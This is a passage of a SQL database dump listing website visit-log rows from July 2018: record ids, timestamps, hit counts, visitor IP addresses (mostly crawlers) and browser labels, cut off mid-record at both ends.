54.36.148.171','other'),(266141,1530534392,1,1,0,0,'54.36.149.38','other'),(266142,1530534516,1,1,0,0,'54.36.149.30','other'),(266143,1530534608,1,1,0,0,'54.36.148.45','other'),(266144,1530534609,2,2,0,0,'91.196.178.75','chrome'),(266145,1530534663,1,1,0,0,'157.55.39.102','other'),(266146,1530534724,1,1,0,0,'54.36.148.252','other'),(266147,1530534734,1,1,0,0,'176.122.98.4','firefox'),(266148,1530534793,1,1,0,0,'54.36.148.236','other'),(266149,1530534912,1,1,0,0,'54.36.149.49','other'),(266150,1530534932,1,1,0,0,'8.29.198.25','other'),(266151,1530534954,1,1,0,0,'54.36.149.87','other'),(266152,1530535033,1,1,0,0,'54.36.148.199','other'),(266153,1530535272,1,1,0,0,'54.36.148.105','other'),(266154,1530535281,1,1,0,0,'95.163.255.169','other'),(266155,1530535365,1,1,0,0,'54.36.148.48','other'),(266156,1530535376,1,1,0,0,'195.244.8.101','chrome'),(266157,1530535531,3,3,0,0,'91.196.178.75','chrome'),(266158,1530535551,1,1,0,0,'54.36.148.117','other'),(266159,1530535881,1,1,0,0,'69.171.225.28','other'),(266160,1530535943,1,1,0,0,'54.36.148.21','other'),(266161,1530535984,1,1,0,0,'54.36.148.206','other'),(266162,1530535994,2,2,0,0,'216.244.66.241','other'),(266164,1530536022,1,1,0,0,'54.36.149.90','other'),(266165,1530536051,2,2,0,0,'66.249.66.155','chrome'),(266166,1530536194,1,1,0,0,'54.36.148.153','other'),(266167,1530536219,1,1,0,0,'91.196.178.87','firefox'),(266168,1530536348,1,1,0,0,'157.55.39.100','other'),(266169,1530536657,1,1,0,0,'54.36.148.43','other'),(266170,1530536797,1,1,0,0,'46.211.155.129','chrome'),(266171,1530536869,1,1,0,0,'173.252.92.24','other'),(266172,1530536919,1,1,0,0,'46.211.86.144','chrome'),(266173,1530536943,1,1,0,0,'54.36.148.126','other'),(266174,1530536948,1,1,0,0,'69.171.225.46','other'),(266175,1530537001,1,1,0,0,'54.36.148.121','other'),(266176,1530537029,1,1,0,0,'173.252.122.146','other'),(266177,1530537058,1,1,0,0,'54.36.148.154','other'),(266178,1530537113,1,1,0,0,'77.91.158.84','chrome'),(266179,1530537154,1,1,0,0,'54.36.148.103','other'),(266180,1530537354,2,2,0,0,'91.196.178.75','chrome'),(266181,1530537379,1,1,0,0,'62.84.248.11','chrome'),(266182,1530537504,1,1,0,0,'91.196.178.129','chrome'),(266183,1530537552,1,1,0,0,'54.36.148.95','other'),(266184,1530537756,1,1,0,0,'54.36.148.24','other'),(266185,1530537942,1,1,0,0,'54.36.149.10','other'),(266186,1530537961,3,3,0,0,'141.8.142.74','other'),(266187,1530537966,1,1,0,0,'54.36.148.244','other'),(266188,1530538014,1,1,0,0,'178.154.171.88','other'),(266189,1530538028,1,1,0,0,'54.36.148.181','other'),(266190,1530538067,1,1,0,0,'66.249.66.61','chrome'),(266191,1530538146,1,1,0,0,'173.252.90.165','other'),(266192,1530538180,1,1,0,0,'54.36.149.65','other'),(266193,1530538235,1,1,0,0,'173.252.88.23','other'),(266194,1530538344,1,1,0,0,'54.36.148.141','other'),(266195,1530538361,1,1,0,0,'54.36.148.139','other'),(266196,1530538470,1,1,0,0,'54.36.148.112','other'),(266197,1530538529,1,1,0,0,'54.36.149.54','other'),(266198,1530538622,1,1,0,0,'176.122.101.138','chrome'),(266199,1530538637,1,1,0,0,'54.36.148.99','other'),(266200,1530538709,1,1,0,0,'37.9.113.182','other'),(266201,1530538723,1,1,0,0,'46.211.86.144','chrome'),(266202,1530538947,1,1,0,0,'178.154.171.88','other'),(266203,1530539138,1,1,0,0,'54.36.148.123','other'),(266204,1530539501,1,0,1,0,'66.249.66.155',''),(266205,1530539537,1,1,0,0,'54.36.149.75','other'),(266206,1530539763,1,1,0,0,'92.112.239.185','chrome'),(266207,1530540063,1,1,0,0,'54.36.148.62','other'),(266208,1530540067,1,1,0,0,'54.36.148.182','other'),(266209,1530540092,1,1,0,0,'54.36.148.112','other'),(266210,1530540325,1,1,0,0,'180.76.15.144','other'),(266211,1530540432,1,1,0,0,'91.196.178.186','chrome'),(266212,1530540470,1,1,0,0,'54.36.149.18','other'),(266213,1530540490,1,1,0,0,'54.36.149.43','other'),(266214,1530540653,1,1,0,0,'54.36.149.0','other'),(266215,1530540809,1,1,0,0,'54.36.149.15','other'),(266216,1530540880,1,1,0,0,'35.239.135.210','other'),(266217,1530541068,2,2,0,0,'216.244.66.241','other'),(266218,1530541088,2,2,0,0,'199.58.86.206','other'),(266219,1530541120,8,8,0,0,'195.154.146.17','other'),(266220,1530541136,1,1,0,0,'37.54.194.117','chrome'),(266221,1530541185,1,1,0,0,'62.84.251.73','chrome'),(266222,1530541399,1,1,0,0,'54.36.149.105','other'),(266223,1530541462,1,1,0,0,'54.36.148.177','other'),(266224,1530541486,1,1,0,0,'54.36.148.22','other'),(266225,1530541522,4,4,0,0,'198.204.243.138','other'),(266226,1530541566,1,1,0,0,'54.36.149.77','other'),(266227,1530541594,1,1,0,0,'83.218.230.89','chrome'),(266228,1530541609,1,1,0,0,'8.29.198.26','other'),(266229,1530541615,1,1,0,0,'54.36.148.187','other'),(266230,1530541705,1,1,0,0,'178.154.171.88','other'),(266231,1530541837,1,1,0,0,'95.163.255.98','other'),(266232,1530541900,1,1,0,0,'66.249.66.155','chrome'),(266233,1530541910,1,1,0,0,'54.36.148.46','other'),(266234,1530541930,1,1,0,0,'54.36.148.145','other'),(266235,1530541998,1,1,0,0,'54.36.149.9','other'),(266236,1530542018,1,1,0,0,'54.36.148.176','other'),(266237,1530542021,1,1,0,0,'54.36.148.18','other'),(266238,1530542023,2,2,0,0,'87.250.224.46','other'),(266239,1530542028,1,1,0,0,'95.163.255.99','other'),(266240,1530542167,1,1,0,0,'54.36.148.119','other'),(266241,1530542280,1,1,0,0,'54.36.148.193','other'),(266242,1530542472,1,1,0,0,'95.163.255.186','other'),(266243,1530542510,1,1,0,0,'54.36.148.141','other'),(266244,1530542536,1,1,0,0,'66.249.66.57','chrome'),(266245,1530542585,1,1,0,0,'91.196.178.74','firefox'),(266246,1530542805,1,1,0,0,'37.73.104.16','chrome'),(266247,1530542950,1,1,0,0,'107.167.108.187','other'),(266248,1530543365,1,1,0,0,'54.36.148.35','other'),(266249,1530543636,1,1,0,0,'91.196.122.158','other'),(266250,1530543809,1,1,0,0,'109.207.199.106','chrome'),(266251,1530543830,1,1,0,0,'66.249.66.61','chrome'),(266252,1530543948,1,1,0,0,'54.36.148.214','other'),(266253,1530544053,1,1,0,0,'54.36.149.5','other'),(266254,1530544066,1,1,0,0,'54.36.148.38','other'),(266255,1530544232,1,1,0,0,'87.250.224.46','other'),(266256,1530544411,1,1,0,0,'54.36.148.92','other'),(266257,1530544445,1,1,0,0,'141.8.142.74','other'),(266258,1530544496,1,1,0,0,'54.36.149.67','other'),(266259,1530544536,1,1,0,0,'173.252.85.199','other'),(266260,1530544557,1,1,0,0,'54.36.148.162','other'),(266261,1530544697,1,1,0,0,'173.252.85.48','other'),(266262,1530544805,2,2,0,0,'54.36.148.39','other'),(266263,1530544954,1,1,0,0,'54.36.148.79','other'),(266264,1530544977,1,1,0,0,'54.36.148.93','other'),(266265,1530545243,1,1,0,0,'54.36.148.134','other'),(266266,1530545455,1,1,0,0,'141.8.142.74','other'),(266267,1530545744,3,3,0,0,'216.244.66.241','other'),(266268,1530545790,1,1,0,0,'8.29.198.26','other'),(266269,1530545964,1,1,0,0,'54.36.148.162','other'),(266270,1530546013,1,1,0,0,'54.36.148.177','other'),(266271,1530546183,1,1,0,0,'54.36.149.99','other'),(266272,1530546449,1,1,0,0,'54.36.148.75','other'),(266273,1530546499,1,1,0,0,'54.36.148.240','other'),(266274,1530546663,2,0,2,0,'66.249.66.156',''),(266275,1530546769,1,1,0,0,'54.36.148.251','other'),(266276,1530546865,1,1,0,0,'54.36.149.88','other'),(266277,1530546888,1,0,1,0,'66.249.66.155',''),(266278,1530546924,1,1,0,0,'54.36.148.54','other'),(266279,1530547101,1,1,0,0,'188.230.43.254','other'),(266280,1530547259,1,1,0,0,'173.252.85.214','other'),(266281,1530547260,1,1,0,0,'5.45.207.83','other'),(266282,1530547342,1,1,0,0,'54.36.148.230','other'),(266283,1530547392,8,8,0,0,'148.251.9.145','other'),(266284,1530547804,1,1,0,0,'54.36.148.26','other'),(266285,1530547893,3,3,0,0,'141.8.142.74','other'),(266286,1530547914,1,1,0,0,'54.36.148.253','other'),(266287,1530547952,1,1,0,0,'95.163.255.99','other'),(266288,1530548210,1,1,0,0,'95.163.255.222','other'),(266289,1530548276,1,1,0,0,'54.36.148.183','other'),(266290,1530548301,1,1,0,0,'95.163.255.113','other'),(266291,1530548315,1,1,0,0,'95.163.255.117','other'),(266292,1530548332,1,1,0,0,'95.163.255.102','other'),(266293,1530548349,1,1,0,0,'95.163.255.103','other'),(266294,1530548454,1,1,0,0,'95.163.255.98','other'),(266295,1530549106,1,1,0,0,'54.36.148.10','other'),(266296,1530549183,1,1,0,0,'54.36.149.56','other'),(266297,1530549206,1,1,0,0,'66.249.66.61','chrome'),(266298,1530549236,1,1,0,0,'54.36.148.86','other'),(266299,1530549281,5,5,0,0,'216.244.66.241','other'),(266300,1530549358,1,1,0,0,'54.36.149.94','other'),(266301,1530549369,1,1,0,0,'69.171.240.252','other'),(266302,1530549533,1,1,0,0,'188.230.43.254','other'),(266303,1530549534,2,2,0,0,'178.154.171.88','other'),(266304,1530549786,1,1,0,0,'54.36.148.132','other'),(266305,1530549939,1,1,0,0,'54.36.148.11','other'),(266306,1530549969,1,1,0,0,'54.36.149.68','other'),(266307,1530550134,1,1,0,0,'54.36.149.72','other'),(266308,1530550320,1,1,0,0,'54.36.148.205','other'),(266309,1530550375,1,1,0,0,'37.9.113.182','other'),(266310,1530550452,1,1,0,0,'54.36.148.146','other'),(266311,1530550496,1,1,0,0,'141.8.142.74','other'),(266312,1530550530,1,1,0,0,'54.36.149.38','other'),(266313,1530550561,1,1,0,0,'87.250.224.46','other'),(266314,1530550617,1,1,0,0,'54.36.148.130','other'),(266315,1530550883,1,1,0,0,'216.244.66.241','other'),(266316,1530550969,2,1,1,0,'66.249.66.157',''),(266317,1530550987,1,0,1,0,'66.249.66.155',''),(266318,1530551002,1,1,0,0,'176.102.55.153','chrome'),(266319,1530551125,1,1,0,0,'54.36.148.61','other'),(266320,1530551195,1,1,0,0,'92.113.189.235','chrome'),(266321,1530551213,1,1,0,0,'54.36.148.219','other'),(266322,1530551217,1,1,0,0,'69.171.225.64','other'),(266323,1530551350,2,2,0,0,'178.154.171.88','other'),(266324,1530551483,1,1,0,0,'54.36.148.102','other'),(266325,1530551756,1,1,0,0,'54.36.148.190','other'),(266326,1530551808,1,1,0,0,'66.249.66.57','chrome'),(266327,1530551823,1,1,0,0,'54.36.148.120','other'),(266328,1530551898,1,1,0,0,'188.230.43.254','other'),(266329,1530551985,1,1,0,0,'46.211.115.13','chrome'),(266330,1530552127,1,0,1,0,'66.249.66.61',''),(266331,1530552186,1,1,0,0,'95.163.255.202','other'),(266332,1530552188,2,2,0,0,'216.244.66.241','other'),(266333,1530552392,1,1,0,0,'178.154.171.88','other'),(266334,1530552443,1,1,0,0,'8.29.198.25','other'),(266335,1530552570,1,1,0,0,'54.36.148.64','other'),(266336,1530552624,2,2,0,0,'141.8.142.74','other'),(266337,1530552761,1,1,0,0,'54.36.148.169','other'),(266338,1530552892,1,1,0,0,'54.36.149.18','other'),(266339,1530552933,1,1,0,0,'62.84.249.169','firefox'),(266340,1530553036,1,1,0,0,'54.36.148.112','other'),(266341,1530553414,1,1,0,0,'54.36.149.88','other'),(266342,1530553537,1,1,0,0,'54.36.149.105','other'),(266343,1530553538,1,1,0,0,'54.36.148.91','other'),(266344,1530553546,2,2,0,0,'216.244.66.241','other'),(266345,1530553887,1,1,0,0,'54.36.148.239','other'),(266346,1530553995,1,1,0,0,'54.36.148.183','other'),(266347,1530554026,2,2,0,0,'178.251.109.245','chrome'),(266348,1530554291,1,1,0,0,'188.230.43.254','other'),(266349,1530554458,1,1,0,0,'54.36.148.138','other'),(266350,1530554464,1,1,0,0,'180.76.15.12','other'),(266351,1530554608,1,1,0,0,'54.36.148.63','other'),(266352,1530554711,1,1,0,0,'91.233.90.22','chrome'),(266353,1530554742,1,1,0,0,'54.36.149.30','other'),(266354,1530554810,1,1,0,0,'91.196.178.131','firefox'),(266355,1530554855,2,2,0,0,'216.244.66.241','other'),(266356,1530554884,1,1,0,0,'54.36.148.221','other'),(266357,1530554986,1,1,0,0,'178.154.171.88','other'),(266358,1530555087,1,1,0,0,'87.250.224.46','other'),(266359,1530555157,1,1,0,0,'157.55.39.102','other'),(266360,1530555179,1,1,0,0,'69.171.240.251','other'),(266361,1530555627,1,1,0,0,'46.211.132.32','chrome'),(266362,1530555651,1,1,0,0,'141.8.132.19','other'),(266363,1530555873,2,2,0,0,'91.196.178.167','chrome'),(266364,1530556020,1,1,0,0,'54.36.148.232','other'),(266365,1530556042,1,1,0,0,'54.36.148.29','other'),(266366,1530556172,1,1,0,0,'54.36.149.14','other'),(266367,1530556174,1,1,0,0,'66.249.66.59','chrome'),(266368,1530556383,1,1,0,0,'54.36.149.29','other'),(266369,1530556465,1,1,0,0,'77.93.34.44','chrome'),(266370,1530556642,1,1,0,0,'8.29.198.27','other'),(266371,1530556691,1,1,0,0,'188.230.43.254','other'),(266372,1530556825,1,1,0,0,'54.36.148.230','other'),(266373,1530556917,1,1,0,0,'37.9.113.115','other'),(266374,1530557047,1,1,0,0,'54.36.148.60','other'),(266375,1530557054,1,1,0,0,'54.36.148.245','other'),(266376,1530557058,1,1,0,0,'54.36.148.186','other'),(266377,1530557075,1,1,0,0,'54.36.148.86','other'),(266378,1530557223,1,1,0,0,'54.36.149.70','other'),(266379,1530557717,3,3,0,0,'216.244.66.241','other'),(266380,1530557745,1,1,0,0,'54.36.148.37','other'),(266381,1530558025,1,1,0,0,'54.36.149.30','other'),(266382,1530558027,1,1,0,0,'141.8.142.74','other'),(266383,1530558177,2,2,0,0,'95.163.255.108','other'),(266384,1530558183,1,1,0,0,'95.163.255.102','other'),(266385,1530558190,5,5,0,0,'95.163.255.112','other'),(266386,1530558203,4,4,0,0,'95.163.255.117','other'),(266387,1530558232,1,1,0,0,'95.163.255.115','other'),(266388,1530558237,1,1,0,0,'95.163.255.118','other'),(266389,1530558244,2,2,0,0,'95.163.255.107','other'),(266390,1530558273,1,1,0,0,'46.219.95.16','chrome'),(266391,1530558284,1,1,0,0,'95.163.255.119','other'),(266392,1530558480,3,3,0,0,'91.196.178.69','chrome'),(266393,1530558512,1,1,0,0,'54.36.148.196','other'),(266394,1530558513,1,1,0,0,'54.36.148.78','other'),(266395,1530558533,1,1,0,0,'54.36.148.17','other'),(266396,1530558709,1,1,0,0,'54.36.148.255','other'),(266397,1530558779,1,1,0,0,'54.36.148.50','other'),(266398,1530558879,1,1,0,0,'54.36.148.223','other'),(266399,1530558890,2,2,0,0,'54.36.149.42','other'),(266400,1530558933,1,1,0,0,'54.36.148.33','other'),(266401,1530559059,1,1,0,0,'173.252.88.8','other'),(266402,1530559276,1,1,0,0,'95.163.255.98','other'),(266403,1530559356,1,1,0,0,'37.54.23.36','chrome'),(266404,1530559556,1,1,0,0,'87.250.224.46','other'),(266405,1530559574,1,1,0,0,'95.163.255.231','other'),(266406,1530559625,1,1,0,0,'91.209.11.236','other'),(266407,1530559627,1,1,0,0,'37.73.41.87','other'),(266408,1530559748,1,1,0,0,'95.163.255.95','other'),(266409,1530559754,2,2,0,0,'216.244.66.241','other'),(266410,1530559801,1,1,0,0,'173.252.123.129','other'),(266411,1530559826,1,1,0,0,'54.36.148.172','other'),(266412,1530559859,1,1,0,0,'54.36.148.62','other'),(266413,1530559875,1,1,0,0,'95.163.255.97','other'),(266414,1530559953,1,1,0,0,'54.36.148.173','other'),(266415,1530560013,1,1,0,0,'54.36.149.40','other'),(266416,1530560014,1,1,0,0,'95.163.255.161','other'),(266417,1530560201,1,1,0,0,'54.36.148.72','other'),(266418,1530560330,1,1,0,0,'54.36.148.58','other'),(266419,1530560346,1,1,0,0,'141.8.142.74','other'),(266420,1530560543,1,1,0,0,'54.36.148.93','other'),(266421,1530560667,2,2,0,0,'178.154.171.88','other'),(266422,1530560816,1,1,0,0,'46.185.2.145','chrome'),(266423,1530560887,1,1,0,0,'91.124.238.36','chrome'),(266424,1530560911,1,1,0,0,'54.36.148.20','other'),(266425,1530560982,1,1,0,0,'54.36.149.46','other'),(266426,1530560995,1,1,0,0,'54.36.148.203','other'),(266427,1530561388,1,1,0,0,'54.36.149.64','other'),(266428,1530561443,2,2,0,0,'35.239.135.210','other'),(266429,1530561513,1,1,0,0,'54.36.149.92','other'),(266430,1530561671,1,1,0,0,'54.36.148.160','other'),(266431,1530561745,1,1,0,0,'46.219.235.209','chrome'),(266432,1530562092,2,2,0,0,'54.36.148.100','other'),(266433,1530562119,1,1,0,0,'54.36.149.25','other'),(266434,1530562197,1,0,1,0,'66.249.66.59',''),(266435,1530562364,1,1,0,0,'54.36.148.82','other'),(266436,1530562426,2,2,0,0,'216.244.66.241','other'),(266437,1530562447,1,1,0,0,'54.36.148.209','other'),(266439,1530562448,2,2,0,0,'91.196.178.167','chrome'),(266440,1530562492,2,2,0,0,'92.113.189.235','chrome'),(266441,1530562598,1,1,0,0,'54.36.149.68','other'),(266442,1530562687,1,1,0,0,'54.36.148.248','other'),(266443,1530562743,1,1,0,0,'173.252.90.234','other'),(266444,1530563012,1,1,0,0,'188.163.5.52','chrome'),(266445,1530563269,1,1,0,0,'8.29.198.25','other'),(266446,1530563484,1,1,0,0,'54.36.148.197','other'),(266447,1530563494,1,1,0,0,'54.36.148.190','other'),(266448,1530563859,1,1,0,0,'54.36.148.46','other'),(266449,1530564207,1,1,0,0,'54.36.148.71','other'),(266450,1530564282,1,1,0,0,'54.36.149.74','other'),(266451,1530564339,2,2,0,0,'91.196.178.166','firefox'),(266452,1530564428,1,1,0,0,'87.250.224.46','other'),(266453,1530564670,1,1,0,0,'54.36.149.37','other'),(266454,1530564795,1,1,0,0,'54.36.148.113','other'),(266455,1530564969,1,1,0,0,'141.8.142.74','other'),(266456,1530565250,1,1,0,0,'216.244.66.241','other'),(266457,1530565275,1,1,0,0,'95.163.255.99','other'),(266458,1530565309,1,1,0,0,'95.163.255.94','other'),(266459,1530565433,1,1,0,0,'54.36.148.202','other'),(266460,1530565453,3,3,0,0,'178.154.171.88','other'),(266461,1530565609,1,1,0,0,'91.196.178.136','chrome'),(266462,1530565737,1,1,0,0,'95.163.255.154','other'),(266463,1530565768,1,1,0,0,'54.36.149.79','other'),(266464,1530565858,1,1,0,0,'54.36.148.204','other'),(266465,1530565924,1,1,0,0,'66.102.9.38','chrome'),(266466,1530565930,1,1,0,0,'66.102.9.35','chrome'),(266467,1530566098,1,1,0,0,'141.8.142.74','other'),(266468,1530566321,1,1,0,0,'54.36.149.47','other'),(266469,1530566435,1,1,0,0,'54.36.149.18','other'),(266470,1530566511,1,1,0,0,'54.36.148.72','other'),(266471,1530566764,2,2,0,0,'216.244.66.241','other'),(266472,1530567277,1,1,0,0,'54.36.148.169','other'),(266473,1530567332,2,2,0,0,'141.8.142.74','other'),(266474,1530567447,1,1,0,0,'54.36.148.47','other'),(266475,1530567473,1,1,0,0,'54.36.148.91','other'),(266476,1530567478,1,1,0,0,'8.29.198.26','other'),(266477,1530567701,1,1,0,0,'54.36.148.142','other'),(266478,1530567741,1,1,0,0,'54.36.149.59','other'),(266479,1530567890,1,1,0,0,'87.250.224.46','other'),(266480,1530568071,1,1,0,0,'54.36.149.31','other'),(266481,1530568104,4,4,0,0,'192.151.152.98','other'),(266482,1530568120,1,1,0,0,'54.36.148.98','other'),(266483,1530568317,1,1,0,0,'54.36.149.80','other'),(266484,1530568398,1,1,0,0,'54.36.148.192','other'),(266485,1530568405,1,1,0,0,'54.36.148.113','other'),(266486,1530568469,1,1,0,0,'54.36.149.52','other'),(266487,1530568568,1,1,0,0,'54.36.148.88','other'),(266488,1530568670,1,1,0,0,'54.36.148.165','other'),(266489,1530568790,1,1,0,0,'54.36.148.151','other'),(266490,1530568935,1,1,0,0,'54.36.148.85','other'),(266491,1530569071,1,1,0,0,'54.36.149.36','other'),(266492,1530569160,2,2,0,0,'141.8.142.74','other'),(266493,1530569293,1,1,0,0,'54.36.149.96','other'),(266494,1530569727,1,1,0,0,'54.36.148.199','other'),(266495,1530569986,1,1,0,0,'87.250.224.46','other'),(266496,1530570117,1,1,0,0,'54.36.148.224','other'),(266497,1530570219,1,1,0,0,'54.36.149.7','other'),(266498,1530570238,1,1,0,0,'54.36.148.41','other'),(266499,1530570359,1,1,0,0,'54.36.148.91','other'),(266500,1530570470,1,1,0,0,'54.36.149.94','other'),(266501,1530570835,1,1,0,0,'54.36.148.128','other'),(266502,1530571424,1,1,0,0,'95.163.255.98','other'),(266503,1530571496,1,1,0,0,'54.36.148.50','other'),(266504,1530571570,1,1,0,0,'95.163.255.97','other'),(266505,1530571576,1,1,0,0,'95.163.255.92','other'),(266506,1530571591,1,1,0,0,'54.36.148.192','other'),(266507,1530571617,1,1,0,0,'54.36.148.87','other'),(266508,1530571837,1,1,0,0,'54.36.148.57','other'),(266509,1530571980,1,1,0,0,'54.36.149.0','other'),(266510,1530572116,1,1,0,0,'54.36.148.170','other'),(266511,1530572142,1,1,0,0,'54.36.149.62','other'),(266512,1530572291,1,1,0,0,'178.154.200.41','other'),(266513,1530572616,1,1,0,0,'54.36.149.45','other'),(266514,1530572769,1,1,0,0,'54.36.148.136','other'),(266515,1530573050,1,1,0,0,'54.36.148.64','other'),(266516,1530573064,1,1,0,0,'54.36.148.165','other'),(266517,1530573093,1,1,0,0,'54.36.149.85','other'),(266518,1530573176,1,1,0,0,'94.23.29.127','firefox'),(266519,1530573246,1,1,0,0,'54.36.148.206','other'),(266520,1530573439,1,1,0,0,'54.36.148.179','other'),(266521,1530573485,1,1,0,0,'216.244.66.241','other'),(266522,1530573583,2,2,0,0,'87.250.224.46','other'),(266523,1530573651,1,1,0,0,'54.36.148.246','other'),(266524,1530573653,1,1,0,0,'54.36.148.22','other'),(266525,1530573666,1,1,0,0,'54.36.148.156','other'),(266526,1530573712,1,1,0,0,'54.36.149.107','other'),(266527,1530573790,1,1,0,0,'54.36.148.150','other'),(266528,1530573867,1,1,0,0,'54.36.148.96','other'),(266529,1530573940,1,1,0,0,'54.36.148.248','other'),(266530,1530574045,6,6,0,0,'141.8.142.74','other'),(266531,1530574099,1,1,0,0,'8.29.198.26','other'),(266532,1530574151,1,1,0,0,'95.163.255.239','other'),(266533,1530574153,5,5,0,0,'178.154.171.88','other'),(266534,1530574182,1,1,0,0,'136.243.74.142','other'),(266535,1530574863,1,1,0,0,'54.36.148.209','other'),(266536,1530574873,1,1,0,0,'54.36.148.204','other'),(266537,1530574959,1,1,0,0,'95.163.255.241','other'),(266538,1530574988,1,1,0,0,'54.36.148.41','other'),(266539,1530575073,1,1,0,0,'54.36.148.61','other'),(266540,1530575093,1,1,0,0,'178.154.171.88','other'),(266541,1530575281,2,2,0,0,'141.8.142.74','other'),(266542,1530575287,1,1,0,0,'37.9.113.182','other'),(266543,1530575408,1,1,0,0,'54.36.148.158','other'),(266544,1530575676,1,1,0,0,'54.36.148.53','other'),(266545,1530575821,6,6,0,0,'144.76.137.254','other'),(266546,1530575906,1,1,0,0,'54.36.148.45','other'),(266547,1530575943,1,1,0,0,'54.36.148.17','other'),(266548,1530575953,43,43,0,0,'157.55.39.100','other'),(266549,1530575982,44,44,0,0,'157.55.39.102','other'),(266550,1530576041,30,30,0,0,'157.55.39.97','other'),(266551,1530576105,36,36,0,0,'207.46.13.106','other'),(266552,1530576286,1,1,0,0,'178.154.171.88','other'),(266553,1530576299,1,1,0,0,'54.36.148.60','other'),(266554,1530576324,2,2,0,0,'54.36.148.28','other'),(266555,1530576412,2,2,0,0,'141.8.142.74','other'),(266556,1530576440,1,1,0,0,'54.36.148.209','other'),(266557,1530576716,1,1,0,0,'54.36.148.117','other'),(266558,1530576722,1,1,0,0,'95.163.255.185','other'),(266559,1530577197,1,1,0,0,'87.250.224.46','other'),(266560,1530577366,1,1,0,0,'54.36.148.223','other'),(266561,1530577371,1,1,0,0,'54.36.149.27','other'),(266562,1530577426,1,1,0,0,'54.36.149.62','other'),(266563,1530577510,1,1,0,0,'54.36.148.58','other'),(266564,1530577550,1,1,0,0,'95.163.255.93','other'),(266565,1530577768,1,1,0,0,'188.163.5.44','chrome'),(266566,1530577905,1,1,0,0,'216.244.66.241','other'),(266567,1530578252,1,1,0,0,'54.36.148.254','other'),(266568,1530578310,1,1,0,0,'8.29.198.26','other'),(266569,1530578814,1,1,0,0,'141.8.142.74','other'),(266570,1530578887,1,1,0,0,'54.36.149.38','other'),(266571,1530579074,1,1,0,0,'54.36.148.208','other'),(266572,1530579476,1,1,0,0,'54.36.149.32','other'),(266573,1530579688,4,4,0,0,'85.10.207.195','other'),(266574,1530579689,1,1,0,0,'54.36.148.76','other'),(266575,1530579693,1,1,0,0,'95.163.255.222','other'),(266576,1530579856,1,1,0,0,'54.36.148.182','other'),(266577,1530580005,1,1,0,0,'54.36.149.70','other'),(266578,1530580019,1,1,0,0,'54.36.148.215','other'),(266579,1530580261,1,1,0,0,'54.36.149.5','other'),(266580,1530580409,1,1,0,0,'216.244.66.241','other'),(266581,1530580716,1,1,0,0,'54.36.148.54','other'),(266582,1530580922,1,1,0,0,'54.36.148.155','other'),(266583,1530580996,1,1,0,0,'54.36.148.205','other'),(266584,1530581000,1,1,0,0,'54.36.148.248','other'),(266585,1530581053,1,1,0,0,'54.36.148.247','other'),(266586,1530581173,1,1,0,0,'54.36.148.102','other'),(266587,1530581376,1,1,0,0,'54.36.148.61','other'),(266588,1530581387,3,3,0,0,'141.8.142.74','other'),(266589,1530581457,1,1,0,0,'54.36.148.143','other'),(266590,1530581527,1,1,0,0,'54.36.149.12','other'),(266591,1530581563,1,1,0,0,'54.36.149.57','other'),(266592,1530582193,1,1,0,0,'178.140.234.222','msie'),(266593,1530582215,1,1,0,0,'54.36.148.251','other'),(266594,1530582397,1,1,0,0,'95.163.255.187','other'),(266595,1530582513,1,1,0,0,'54.36.148.207','other'),(266596,1530582677,1,1,0,0,'54.36.149.85','other'),(266597,1530582734,1,1,0,0,'54.36.149.103','other'),(266598,1530582787,1,1,0,0,'54.36.148.149','other'),(266599,1530582814,1,1,0,0,'54.36.148.158','other'),(266600,1530582962,1,1,0,0,'95.163.255.97','other'),(266601,1530583020,1,1,0,0,'95.163.255.99','other'),(266602,1530583322,2,2,0,0,'216.244.66.241','other'),(266603,1530583506,1,1,0,0,'54.36.148.52','other'),(266604,1530583622,1,1,0,0,'54.36.148.233','other'),(266605,1530583903,1,1,0,0,'173.249.24.45','firefox'),(266606,1530584018,2,2,0,0,'141.8.142.74','other'),(266607,1530584021,1,1,0,0,'2.247.241.107','other'),(266608,1530584066,1,1,0,0,'37.9.113.182','other'),(266609,1530584751,1,1,0,0,'54.36.148.195','other'),(266610,1530584931,1,1,0,0,'8.29.198.27','other'),(266611,1530584952,1,1,0,0,'54.36.148.76','other'),(266612,1530584970,1,1,0,0,'54.36.148.110','other'),(266613,1530585002,1,1,0,0,'54.36.148.159','other'),(266614,1530585528,1,1,0,0,'54.36.149.7','other'),(266615,1530585569,1,1,0,0,'54.36.148.188','other'),(266616,1530585654,1,1,0,0,'141.8.142.74','other'),(266617,1530585811,3,3,0,0,'216.244.66.241','other'),(266618,1530585836,1,1,0,0,'54.36.148.242','other'),(266619,1530585941,1,1,0,0,'87.250.224.46','other'),(266620,1530585948,1,1,0,0,'46.211.0.3','other'),(266621,1530586033,2,2,0,0,'54.36.148.102','other'),(266622,1530586098,2,2,0,0,'95.213.141.126','opera'),(266623,1530586338,1,1,0,0,'54.36.148.151','other'),(266624,1530586345,1,1,0,0,'178.154.171.88','other'),(266625,1530586626,1,1,0,0,'178.154.200.41','other'),(266626,1530586641,1,1,0,0,'54.36.148.202','other'),(266627,1530586711,1,1,0,0,'54.36.148.139','other'),(266628,1530586911,1,1,0,0,'95.163.255.177','other'),(266629,1530587206,1,1,0,0,'54.36.148.220','other'),(266630,1530587264,1,1,0,0,'54.36.149.54','other'),(266631,1530587361,1,1,0,0,'95.163.255.197','other'),(266632,1530587553,1,1,0,0,'178.154.171.88','other'),(266633,1530587905,3,3,0,0,'216.244.66.241','other'),(266634,1530588030,1,1,0,0,'54.36.148.243','other'),(266635,1530588040,1,1,0,0,'54.36.148.61','other'),(266636,1530588114,1,1,0,0,'54.36.149.83','other'),(266637,1530588376,1,1,0,0,'141.8.142.74','other'),(266638,1530588473,1,1,0,0,'54.36.148.200','other'),(266639,1530588540,1,1,0,0,'95.163.255.94','other'),(266640,1530588686,1,1,0,0,'54.36.149.41','other'),(266641,1530588702,1,1,0,0,'54.36.149.106','other'),(266642,1530588879,1,1,0,0,'54.36.149.20','other'),(266643,1530589161,1,1,0,0,'8.29.198.25','other'),(266644,1530589256,1,1,0,0,'95.163.255.186','other'),(266645,1530589353,1,1,0,0,'54.36.148.205','other'),(266646,1530589400,1,1,0,0,'54.36.148.87','other'),(266647,1530589518,1,1,0,0,'87.250.224.46','other'),(266648,1530589576,2,2,0,0,'141.8.142.74','other'),(266649,1530589800,1,1,0,0,'178.154.171.88','other'),(266650,1530589830,1,1,0,0,'54.36.148.44','other'),(266651,1530589892,1,1,0,0,'54.36.148.100','other'),(266652,1530589906,1,1,0,0,'54.36.148.99','other'),(266653,1530589943,1,1,0,0,'54.36.149.107','other'),(266654,1530590022,1,1,0,0,'54.36.149.97','other'),(266655,1530590100,1,1,0,0,'54.36.149.96','other'),(266656,15305902